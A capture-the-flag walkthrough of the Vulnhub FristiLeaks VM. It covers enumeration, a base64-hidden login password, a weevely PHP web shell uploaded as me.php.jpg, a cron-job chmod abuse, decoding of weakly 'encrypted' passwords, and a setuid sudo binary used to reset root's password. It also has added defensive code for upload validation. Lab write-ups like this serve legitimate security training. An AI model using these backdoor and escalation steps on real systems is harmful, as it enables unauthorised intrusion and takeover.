Vulnhub fristileaks

Enumeration

We’ll start with the usual Nmap, our home boy!

nmap -vv -sS -T4 -Pn -A -sC -p- 192.168.1.124

Only port 80 is open to us, and Nmap explains why the rest of the ports show as filtered:
Reason: 65396 no-responses and 138 host-prohibiteds

We also see there’s some info in the robots.txt

http-robots.txt: 3 disallowed entries
/cola /sisi /beer

There’s also the Apache version -> http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3

There’s also an OS detection guess ->

Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13

Nikto

Since it’s running a web server, let’s run Nikto against it.

nikto -h 192.168.1.124

Looking at the results we get a bit more info: a few more folders found on the website.

There are the additional /icons/ and /images/ directories.

dirb

Now let’s run dirb to try to find even more directories

dirb http://192.168.1.124 /usr/share/wordlists/dir/common.txt

This did not give us any valuable information.
I’ll try the big.txt wordlist and meanwhile look at the source code of the website.

Two hours later

I just couldn’t find what to do, so I had to go read a writeup…

The URL was /fristi/

I only took that piece of information and stopped reading, let’s continue.

That leads us to a page with a login and a picture. First reflex is looking at the source code.

We can notice that there’s a comment saying

<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->

At the top it’s also written:

We use base64 encoding for images so they are inline in the HTML. I read
somewhere on the web, that that’s a good way to do it

And near the end of the page there is a base64 string in a commented-out block.

We can assume that’s another picture.

Let’s decode that string instead of the one being loaded before trying to break the
login. Or, better, we can run Burp Intruder against the login while we’re doing the
base64 image thing. That’s a good idea.

So by googling a base64 image decoder and pasting the string, we get this word

keKkeKKeKKeKkekkek

Meanwhile I had Burp Intruder try to bypass the login using SQL injection, and
none of the payloads went through.

In the page source the comment was signed eezeepz.

Let’s try eezeepz:keKkeKKeKKeKkekkek, what if…

And it worked…

So we got an upload page, it smells like a reverse shell

Life is Weevely

Let’s generate a backdoor with weevely.

weevely generate toor me.php

We’ll upload that PHP file through the upload page.
But wait a second, it doesn’t accept .php extensions.

We’ll rename it to me.jpg and try to upload it again, and it works perfectly.
It’s uploaded to uploads/
Let’s try to access the page http://192.168.1.124/fristi/uploads/me.jpg

And there it is.

Weevely the beautiful

Let’s connect to our backdoor

weevely http://192.168.1.124/fristi/uploads/me.jpg toor

And it doesn’t work. I’m assuming it absolutely needs a .php extension?

After googling for an hour, I found a page that mentions that if we add php to the file name, the PHP will be allowed to execute even though the file is a jpg.

So I renamed it to me.php.jpg, tried weevely again and BOOM! Houston, we are in.
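Here is an added example, written for this writeup rather than taken from the VM or from any upload page's real code, of why me.php.jpg slipped through. The page does not say how the upload form validates names; the assumption here is a check that only looks at the final extension, and that the web server applies a PHP handler to any name containing a .php segment (Apache's multiple-extension behaviour, the usual reason a .php.jpg runs). The SCRIPT_EXTENSIONS set and the magic-byte table are constructed for the example.

```python
import secrets

# Constructed for this example: extension segments a typical Apache + mod_php
# setup may hand to an interpreter. Tune it to the handlers actually configured.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "pl", "py", "cgi", "sh"}

# Allowed image types and the magic bytes each file body should start with.
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """The kind of check the upload page appears to use (assumption): it only
    inspects the final extension, so 'me.php.jpg' is accepted."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_TYPES


def strict_check(filename: str) -> bool:
    """Reject the name if *any* dot-separated segment is a script extension.
    With multiple-extension handling, 'me.php.jpg' still carries the php
    handler even though its last extension says image."""
    segments = filename.lower().split(".")
    if len(segments) < 2 or segments[-1] not in ALLOWED_TYPES:
        return False
    return not any(seg in SCRIPT_EXTENSIONS for seg in segments[:-1])


def validate_upload(filename: str, data: bytes):
    """Return a server-chosen storage name, or None if the upload is rejected.

    Three layers: every extension segment is checked, the body must start with
    the magic bytes of the claimed type, and the user-supplied name is discarded
    entirely so nothing the client chose ever reaches the filesystem."""
    if not strict_check(filename):
        return None
    ext = filename.lower().rsplit(".", 1)[-1]
    if not data.startswith(ALLOWED_TYPES[ext]):
        return None
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    # Constructed sample bodies: a JPEG-looking header and a harmless PHP file.
    jpeg_body = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    php_body = b"<?php echo 'hello'; ?>"
    for name in ("photo.jpg", "me.jpg", "me.php.jpg", "me.php"):
        print(f"{name:12} weak={weak_check(name)!s:5} strict={strict_check(name)!s:5} "
              f"stored_as={validate_upload(name, jpeg_body)}")
    print("photo.jpg with PHP body ->", validate_upload("photo.jpg", php_body))
```

Renaming the file on the server is the part that actually closes the hole: even if a check is bypassed, a name the attacker never chose cannot carry a handler-triggering segment. Serving the uploads directory with script execution disabled is the matching server-side control.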

Enumeration

Let’s look for the kernel and OS

uname -a

cat /etc/lsb-re*

The cat won’t work because we’re dealing with CentOS instead of a Debian-based machine.

So we got a Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

The thing is, it’s a distro-patched kernel, so this kernel build could already carry fixes for most of the exploits we would find for that version number.

Let’s use weevely’s :audit_filesystem module.

We don’t get much from it, but we do see a /home/eezeepz, which is the same username we used to log in to the website.

Let’s investigate it.

User eezeepz

If we ls -l his home directory we find a lot of executables. Ummmm. Maybe we can add them to our PATH so we can use them? Do we even need to use them?

Going through the list there’s a notes.txt with information inside.

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don’t forget to specify the full path for each binary!

Just put a file called “runthis” in /tmp/, each line one command. The
output goes to the file “cronresult” in /tmp/. It should
run every minute with my account privileges.

Interesting. /home/admin?

Are these the commands we get to work with to achieve root?

cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic

Crontab

So the note told us that we can execute commands as admin by creating a runthis file in /tmp. I’ll start by opening up /home/admin with chmod 777.

vi /tmp/runthis

/home/admin/chmod 777 -R /home/admin

We’ll wait a minute, and then we’ll be able to enter the /home/admin folder.
Once we’re inside, ls -la shows what’s there.

ls -la

drwxrwxrwx. 3 admin     admin       4096 Apr 28 20:43 .
drwxr-xr-x. 5 root      root        4096 Nov 19  2015 ..
-rw-r--r--. 1 admin     admin         18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 admin     admin        176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 admin     admin        124 Sep 22  2015 .bashrc
-rwxr-xr-x  1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x  1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r--  1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r--  1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r--  1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x  1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x  1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 grep
-rw-r--r--  1 admin     admin         12 Apr 28 17:18 me.txt
-rwxr-xr-x  1 admin     admin      85304 Nov 18  2015 ps
-rw-r--r--  1 admin     admin        113 Apr 30 18:21 ps.txt
drwxr-xr-x  2 apache    apache      4096 Apr 28 20:43 resulsts
-rw-r--r--  1 apache    apache      8563 Apr 28 20:43 rpm_res
-rw-r--r--  1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt

We got a file called whoisyourgodnow.txt owned by fristigod that we can cat.

cat whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

There’s also a python script next to a cryptedpass.txt

cat cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq

The python script (cryptpass.py) “encrypts” a string by base64-encoding it, then reversing the result, then applying rot13 (a Caesar cipher with a shift of 13) to “reencrypt” it.

So if we take the string in whoisyourgodnow.txt
and undo the rot13 on it (shift back 13 characters):

RFn0AKnlMHMPIzpyuTI0ITG becomes ESa0NXayZUZCVmclhGV0VGT

Then we take ESa0NXayZUZCVmclhGV0VGT and reverse it TGV0VGhlcmVCZUZyaXN0aSE

Now we decode TGV0VGhlcmVCZUZyaXN0aSE and it gives LetThereBeFristi!

Well, that doesn’t help much on its own, but at least we understand what the script does.
We can now also use it on cryptedpass.txt, and it gives out thisisalsopw123
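As an added example (not the writeup’s steps or the VM’s own cryptpass.py): a Python re-implementation of the scheme described above, base64, reverse, rot13, together with a decoder that undoes it. The two ciphertexts are the ones quoted from whoisyourgodnow.txt and cryptedpass.txt; the decoder also re-pads the base64, because the writeup quotes the first string both with and without its leading “=”. The point worth taking from it: there is no key anywhere in this scheme, so anyone who can read the script can recover every “encrypted” password, which makes it equivalent to storing them in plaintext.

```python
import base64
import codecs

# Ciphertexts quoted in the writeup (whoisyourgodnow.txt and cryptedpass.txt).
WHOISYOURGODNOW = "=RFn0AKnlMHMPIzpyuTI0ITG"
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"


def encrypt(plaintext: str) -> str:
    """Re-implementation of what the writeup says cryptpass.py does:
    base64-encode, reverse the string, then rot13 it."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decrypt(ciphertext: str) -> str:
    """Undo encrypt(): rot13 is its own inverse, then reverse, then base64-decode.
    rot13 leaves digits, '+', '/' and '=' untouched, so the base64 alphabet
    survives the round trip intact."""
    unrotated = codecs.decode(ciphertext, "rot13")
    b64 = unrotated[::-1]
    # Reversing moves any '=' padding from the front of the ciphertext back to
    # the end. Strip and re-add it so a copy that dropped the '=' still decodes.
    b64 = b64.rstrip("=")
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode()


def decrypt_file_contents(text: str) -> str:
    """Convenience wrapper for a file read with cat: tolerate trailing newline."""
    return decrypt(text.strip())


if __name__ == "__main__":
    for name, ct in (("whoisyourgodnow.txt", WHOISYOURGODNOW), ("cryptedpass.txt", CRYPTEDPASS)):
        print(f"{name}: {ct} -> {decrypt(ct)}")
    # Round trip shows the scheme is a pure encoding with no secret involved.
    print(encrypt("LetThereBeFristi!") == WHOISYOURGODNOW)
```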

We now have two strings that look like passwords.
I’ll spawn a TTY shell with python so I can su to another user.

python -c 'import pty; pty.spawn("/bin/sh")'

I’ll try to log in as fristigod using LetThereBeFristi!

Fristigod

It worked! We’re now logged in as fristigod, let’s search for all the files he owns.

find / -user 502

Near the end of the list we get some interesting hits

/var/fristigod
/var/fristigod/.bash_history
/var/fristigod/.secret_admin_stuff

Let’s investigate those files.

cat /var/fristigod/.bash_history

ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

We can see that fristigod has been running some commands as fristi. Interesting.

If we run file on doCom, we notice that it’s a setuid executable.

file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

We’ll use the same command as in the bash_history file.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...

Looking at the bash_history we can see that he reads /var/log/secure, a file
that is only readable by root. This means that any command we append will run
as root. Or at least I think so.

We’ll try to change root’s password.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom passwd root
New password: lol123

BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password: lol123

su root
id
uid=0(root) gid=0(root) groups=0(root)

And there it is.

GG